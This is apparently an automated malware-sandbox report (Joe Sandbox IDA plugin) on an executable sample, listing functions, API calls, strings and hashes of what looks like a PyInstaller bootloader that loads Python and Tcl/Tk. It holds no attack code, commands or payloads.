Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
Instruction ID: 70faa9552047ccec46d88eee84f0e92deb287a84e0b5bc372644f8dfe397ee10
Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
Instruction Fuzzy Hash: 82311976609A81C6EB64AF64F8403EEB374FB84744F94403ADA4E46A95DF3CD548CB24

Function 00007FF7691C4F10 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF7691C4F55

Part of subcall function 00007FF7691C48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C48BC

Part of subcall function 00007FF7691B9C58: HeapFree.KERNEL32(?,?,?,00007FF7691C2032,?,?,?,00007FF7691C206F,?,?,00000000,00007FF7691C2535,?,?,?,00007FF7691C2467), ref: 00007FF7691B9C6E
Part of subcall function 00007FF7691B9C58: GetLastError.KERNEL32(?,?,?,00007FF7691C2032,?,?,?,00007FF7691C206F,?,?,00000000,00007FF7691C2535,?,?,?,00007FF7691C2467), ref: 00007FF7691B9C78

Part of subcall function 00007FF7691B9C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7691B9BEF,?,?,?,?,?,00007FF7691B9ADA), ref: 00007FF7691B9C19
Part of subcall function 00007FF7691B9C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7691B9BEF,?,?,?,?,?,00007FF7691B9ADA), ref: 00007FF7691B9C3E

_get_daylight.LIBCMT ref: 00007FF7691C4F44

Part of subcall function 00007FF7691C4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C491C

_get_daylight.LIBCMT ref: 00007FF7691C51BA
_get_daylight.LIBCMT ref: 00007FF7691C51CB
_get_daylight.LIBCMT ref: 00007FF7691C51DC
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7691C541C), ref: 00007FF7691C5203

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 4070488512-0
Opcode ID: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
Instruction ID: 93601a4186749160260b6781c6fdaa6d3b331dee78fc726bf11f7c6180fb29a1
Opcode Fuzzy Hash: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
Instruction Fuzzy Hash: 47D19F26A0C252C6EB28BF25F8511B9A7B1EF94784FE44135EA4D87686DF3CE441CB60

Function 00007FF7691B9924 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF7691B999D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7691B99B5
RtlVirtualUnwind.KERNEL32 ref: 00007FF7691B99F0
IsDebuggerPresent.KERNEL32 ref: 00007FF7691B9A29
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7691B9A33
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7691B9A3E

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
Instruction ID: e920b468abaa2f5667e041e237593994bace65629b1ef3784732e8ff6be79b8f
Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
Instruction Fuzzy Hash: 90315D36608B81C6DB649F25F8502AEB3B4FB88758FA40135EA9D43B69DF3CD545CB10

Function 00007FF7691C0B84 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C0BD0
FindFirstFileExW.KERNEL32 ref: 00007FF7691C0CDA

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 88c6eeb3815b689bec9e785de6a4435637107cd6a4a104e99c849aa3a7604df1
Instruction ID: 387862141facbb0876d268417b8c75bedefae21d284d01052ae087f4493ecac2
Opcode Fuzzy Hash: 88c6eeb3815b689bec9e785de6a4435637107cd6a4a104e99c849aa3a7604df1
Instruction Fuzzy Hash: C8B1C7A1B18692C1EE68AF25F5101B9E3B1EB54BE4FA45131EA5D07B89DF3CE441CB10

Function 00007FF7691C518C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF7691C51BA

Part of subcall function 00007FF7691C4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C491C

_get_daylight.LIBCMT ref: 00007FF7691C51CB

Part of subcall function 00007FF7691C48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C48BC

_get_daylight.LIBCMT ref: 00007FF7691C51DC

Part of subcall function 00007FF7691C48D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C48EC

Part of subcall function 00007FF7691B9C58: HeapFree.KERNEL32(?,?,?,00007FF7691C2032,?,?,?,00007FF7691C206F,?,?,00000000,00007FF7691C2535,?,?,?,00007FF7691C2467), ref: 00007FF7691B9C6E
Part of subcall function 00007FF7691B9C58: GetLastError.KERNEL32(?,?,?,00007FF7691C2032,?,?,?,00007FF7691C206F,?,?,00000000,00007FF7691C2535,?,?,?,00007FF7691C2467), ref: 00007FF7691B9C78

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7691C541C), ref: 00007FF7691C5203

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3458911817-0
Opcode ID: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
Instruction ID: 9cf476a06e87a2b76ccd705b8f9ed2ce0ab6b908321376459e1b72f4370a8772
Opcode Fuzzy Hash: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
Instruction Fuzzy Hash: 76514B32A1C642C6E728FF21F8915A9E7B0BB48784FE45135EA4D87696DF3CE441CB60

Function 00007FF7691A50B0 Relevance: 157.9, APIs: 44, Strings: 46, Instructions: 364libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A50C0
GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A5101
GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A5126
GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A514B
GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A5173
GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A519B
GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A51C3
GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A51EB
GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A5213

Strings

PyMarshal_ReadObjectFromString, xrefs: 00007FF7691A5489, 00007FF7691A54A5
Py_Finalize, xrefs: 00007FF7691A5141, 00007FF7691A515D
PySys_GetObject, xrefs: 00007FF7691A5641, 00007FF7691A565D
PyErr_NormalizeException, xrefs: 00007FF7691A5321, 00007FF7691A533D
Py_DecRef, xrefs: 00007FF7691A50B6, 00007FF7691A50D2
PyObject_CallFunctionObjArgs, xrefs: 00007FF7691A5529, 00007FF7691A5545
PyConfig_Read, xrefs: 00007FF7691A5231, 00007FF7691A524D
PyEval_EvalCode, xrefs: 00007FF7691A53C1, 00007FF7691A53DD
Py_IsInitialized, xrefs: 00007FF7691A5191, 00007FF7691A51AD
PyImport_AddModule, xrefs: 00007FF7691A53E9, 00007FF7691A5405
PyErr_Print, xrefs: 00007FF7691A5371, 00007FF7691A538D
PyConfig_Clear, xrefs: 00007FF7691A51E1, 00007FF7691A51FD
PyErr_Occurred, xrefs: 00007FF7691A5349, 00007FF7691A5365
GetProcAddress, xrefs: 00007FF7691A50E0
PyUnicode_FromFormat, xrefs: 00007FF7691A5709, 00007FF7691A5725
PyErr_Fetch, xrefs: 00007FF7691A52F9, 00007FF7691A5315
PyImport_ImportModule, xrefs: 00007FF7691A5439, 00007FF7691A5455
PyMem_RawFree, xrefs: 00007FF7691A54B1, 00007FF7691A54CD
PyUnicode_Replace, xrefs: 00007FF7691A5781, 00007FF7691A579D
PyUnicode_FromString, xrefs: 00007FF7691A5731, 00007FF7691A574D
PyErr_Clear, xrefs: 00007FF7691A52D1, 00007FF7691A52ED
Failed to get address for %hs, xrefs: 00007FF7691A50D9
PySys_SetObject, xrefs: 00007FF7691A5669, 00007FF7691A5685
PyConfig_SetString, xrefs: 00007FF7691A5281, 00007FF7691A529D
PyImport_ExecCodeModule, xrefs: 00007FF7691A5411, 00007FF7691A542D
PyObject_SetAttrString, xrefs: 00007FF7691A5579, 00007FF7691A5595
PyUnicode_DecodeFSDefault, xrefs: 00007FF7691A56E1, 00007FF7691A56FD
Py_ExitStatusException, xrefs: 00007FF7691A511C, 00007FF7691A5138
PyStatus_Exception, xrefs: 00007FF7691A5619, 00007FF7691A5635
PyUnicode_AsUTF8, xrefs: 00007FF7691A5691, 00007FF7691A56AD
PyErr_Restore, xrefs: 00007FF7691A5399, 00007FF7691A53B5
Py_InitializeFromConfig, xrefs: 00007FF7691A5169, 00007FF7691A5185
PyUnicode_Join, xrefs: 00007FF7691A5759, 00007FF7691A5775
PyConfig_InitIsolatedConfig, xrefs: 00007FF7691A5209, 00007FF7691A5225
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF7691A55C9, 00007FF7691A55E5
PyConfig_SetBytesString, xrefs: 00007FF7691A5259, 00007FF7691A5275
Py_DecodeLocale, xrefs: 00007FF7691A50F7, 00007FF7691A5113
PyList_Append, xrefs: 00007FF7691A5461, 00007FF7691A547D
Py_PreInitialize, xrefs: 00007FF7691A51B9, 00007FF7691A51D5
PyConfig_SetWideStringList, xrefs: 00007FF7691A52A9, 00007FF7691A52C5
PyObject_CallFunction, xrefs: 00007FF7691A5501, 00007FF7691A551D
PyUnicode_Decode, xrefs: 00007FF7691A56B9, 00007FF7691A56D5
PyObject_GetAttrString, xrefs: 00007FF7691A5551, 00007FF7691A556D
PyObject_Str, xrefs: 00007FF7691A55A1, 00007FF7691A55BD
PyModule_GetDict, xrefs: 00007FF7691A54D9, 00007FF7691A54F5
PyRun_SimpleStringFlags, xrefs: 00007FF7691A55F1, 00007FF7691A560D

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 190572456-2007157414
Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
Instruction ID: b977056ebd8f976bdca1b9f7a3876c64bf4bdb26c63be015a12d340282d95314
Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
Instruction Fuzzy Hash: 1112A2A4A4EB03D1FA1DFF15B9101B8A3B0AF19751BF41835D80E527A0EF3CB95AC661

Function 00007FF7691A6EA0 Relevance: 119.3, APIs: 33, Strings: 35, Instructions: 280libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF7691A6EB7
GetProcAddress.KERNEL32 ref: 00007FF7691A6EFD
GetProcAddress.KERNEL32 ref: 00007FF7691A6F22
GetProcAddress.KERNEL32 ref: 00007FF7691A6F47
GetProcAddress.KERNEL32 ref: 00007FF7691A6F6F
GetProcAddress.KERNEL32 ref: 00007FF7691A6F97
GetProcAddress.KERNEL32 ref: 00007FF7691A6FBF
GetProcAddress.KERNEL32 ref: 00007FF7691A6FE7
GetProcAddress.KERNEL32 ref: 00007FF7691A700F

Strings

Tcl_GetObjResult, xrefs: 00007FF7691A72AD, 00007FF7691A72C9
Tcl_FinalizeThread, xrefs: 00007FF7691A6F8D, 00007FF7691A6FA9
Tcl_ConditionFinalize, xrefs: 00007FF7691A70CD, 00007FF7691A70E9
Tcl_CreateInterp, xrefs: 00007FF7691A6EF3, 00007FF7691A6F0F
Tcl_DeleteInterp, xrefs: 00007FF7691A6FB5, 00007FF7691A6FD1
Tcl_MutexFinalize, xrefs: 00007FF7691A70A5, 00007FF7691A70C1
Tcl_Alloc, xrefs: 00007FF7691A734D, 00007FF7691A7369
Tcl_NewByteArrayObj, xrefs: 00007FF7691A725D, 00007FF7691A7279
Tcl_Init, xrefs: 00007FF7691A6EB0, 00007FF7691A6EC9
Tcl_FindExecutable, xrefs: 00007FF7691A6F18, 00007FF7691A6F34
Tcl_CreateObjCommand, xrefs: 00007FF7691A71E5, 00007FF7691A7201
GetProcAddress, xrefs: 00007FF7691A6ED7
Tcl_GetCurrentThread, xrefs: 00007FF7691A7005, 00007FF7691A7021
Tcl_GetString, xrefs: 00007FF7691A720D, 00007FF7691A7229
Failed to get address for %hs, xrefs: 00007FF7691A6ED0
Tcl_MutexUnlock, xrefs: 00007FF7691A707D, 00007FF7691A7099
Tcl_ConditionWait, xrefs: 00007FF7691A711D, 00007FF7691A7139
Tcl_EvalEx, xrefs: 00007FF7691A72FD, 00007FF7691A7319
Tcl_ThreadQueueEvent, xrefs: 00007FF7691A7145, 00007FF7691A7161
Tcl_DoOneEvent, xrefs: 00007FF7691A6F3D, 00007FF7691A6F59
Tcl_CreateThread, xrefs: 00007FF7691A6FDD, 00007FF7691A6FF9
Tcl_SetVar2, xrefs: 00007FF7691A71BD, 00007FF7691A71D9
Tcl_GetVar2, xrefs: 00007FF7691A7195, 00007FF7691A71B1
Tcl_SetVar2Ex, xrefs: 00007FF7691A7285, 00007FF7691A72A1
Tcl_ThreadAlert, xrefs: 00007FF7691A716D, 00007FF7691A7189
Tcl_NewStringObj, xrefs: 00007FF7691A7235, 00007FF7691A7251
Tcl_EvalObjv, xrefs: 00007FF7691A7325, 00007FF7691A7341
Tk_Init, xrefs: 00007FF7691A739D, 00007FF7691A73B9
Tcl_Finalize, xrefs: 00007FF7691A6F65, 00007FF7691A6F81
Tcl_JoinThread, xrefs: 00007FF7691A702D, 00007FF7691A7049
Tcl_EvalFile, xrefs: 00007FF7691A72D5, 00007FF7691A72F1
Tcl_MutexLock, xrefs: 00007FF7691A7055, 00007FF7691A7071
Tcl_ConditionNotify, xrefs: 00007FF7691A70F5, 00007FF7691A7111
Tk_GetNumMainWindows, xrefs: 00007FF7691A73C5, 00007FF7691A73E1
Tcl_Free, xrefs: 00007FF7691A7375, 00007FF7691A7391

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 190572456-3427451314
Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
Instruction ID: 69b9493a80f2cb657946bd6893dc7617ff764f2252706a07d89c38df2c437110
Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
Instruction Fuzzy Hash: 6FE1AF68A8DB07D1FA1DFF19B9501B8E3B5AF14791FF41036C81E026A4EF3CA959C621

Function 00007FFE13308C24 Relevance: 54.6, APIs: 3, Strings: 28, Instructions: 352COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1330913D
DName::operator+.LIBVCRUNTIME ref: 00007FFE13309175
DName::operator+.LIBVCRUNTIME ref: 00007FFE133091AF

Strings

unsigned , xrefs: 00007FFE133090FA
signed , xrefs: 00007FFE1330910A
double, xrefs: 00007FFE13308D48
volatile, xrefs: 00007FFE13309025
wchar_t, xrefs: 00007FFE133090A8
void, xrefs: 00007FFE13308D86
<unknown>, xrefs: 00007FFE13308F1B
int, xrefs: 00007FFE13308CCE
long, xrefs: 00007FFE13308CBC
__int16, xrefs: 00007FFE13308E1C
auto, xrefs: 00007FFE13308F3F
__int32, xrefs: 00007FFE13308EDB
const, xrefs: 00007FFE13308FDD
char, xrefs: 00007FFE13308CF2
__int8, xrefs: 00007FFE13308E2E
char8_t, xrefs: 00007FFE13308F2D
__int128, xrefs: 00007FFE13308EB7
char16_t, xrefs: 00007FFE13309065
UNKNOWN, xrefs: 00007FFE1330908D
decltype(auto), xrefs: 00007FFE133090C6
__int64, xrefs: 00007FFE13308EC9
__w64 , xrefs: 00007FFE13308E3A
float, xrefs: 00007FFE13308D74
short, xrefs: 00007FFE13308CE0
volatile, xrefs: 00007FFE13308FF8
long , xrefs: 00007FFE13308D31
bool, xrefs: 00007FFE13309056
char32_t, xrefs: 00007FFE133090B7

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: Name::operator+
String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $unsigned $void$volatile$wchar_t
API String ID: 2943138195-1388207849
Opcode ID: 34b20832b4d5a9c82cdd9a34609b0a596913eac70dfc3082442192f721d64891
Instruction ID: adb1d51ea4d471613a155b1a50220207a4ac2e5f6f544f9787335b38b441d6a9
Opcode Fuzzy Hash: 34b20832b4d5a9c82cdd9a34609b0a596913eac70dfc3082442192f721d64891
Instruction Fuzzy Hash: 23F190B2F18E128CF7148B66C9542BC2BB0BB24364F4045B5DA2D76AB9DF7DE644C348

Function 00007FFE1330C3C8 Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 288COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1330C459
DName::operator+.LIBVCRUNTIME ref: 00007FFE1330C492
DName::operator+.LIBVCRUNTIME ref: 00007FFE1330C566
DName::operator+.LIBVCRUNTIME ref: 00007FFE1330C577
DName::operator+.LIBVCRUNTIME ref: 00007FFE1330C5DA
DName::operator+.LIBVCRUNTIME ref: 00007FFE1330C5EA
DName::operator+.LIBVCRUNTIME ref: 00007FFE1330C636
DName::operator+.LIBVCRUNTIME ref: 00007FFE1330C648
DName::operator+.LIBVCRUNTIME ref: 00007FFE1330C7BB
DName::operator+.LIBVCRUNTIME ref: 00007FFE1330C83B
DName::operator+.LIBVCRUNTIME ref: 00007FFE1330C84A

Strings

`anonymous namespace', xrefs: 00007FFE1330C71B

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: Name::operator+
String ID: `anonymous namespace'
API String ID: 2943138195-3062148218
Opcode ID: c36001f134547c1fc12f70ffa9b86d35a9d04869d0c52a2f257cd9dd74f3dfc9
Instruction ID: 44e96f0025a63af91bf83fe82440d8e47277946b5aa61e753f382b76e633f7fe
Opcode Fuzzy Hash: c36001f134547c1fc12f70ffa9b86d35a9d04869d0c52a2f257cd9dd74f3dfc9
Instruction Fuzzy Hash: 65E1BD72A08F829DEB11CF66D4801AD77A0FB64764F4040B5EB6D2BBA6DF38E554C704

Function 00007FF7691A15C0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 137COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to write data chunk!, xrefs: 00007FF7691A1775
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7691A168E
Failed to create symbolic link %s!, xrefs: 00007FF7691A15E2
malloc, xrefs: 00007FF7691A16F6
fopen, xrefs: 00007FF7691A161E
fread, xrefs: 00007FF7691A178C
fseek, xrefs: 00007FF7691A1695
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF7691A16EF
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7691A165B
fwrite, xrefs: 00007FF7691A177C
Failed to extract %s: failed to open target file!, xrefs: 00007FF7691A1617
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7691A1785

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Message
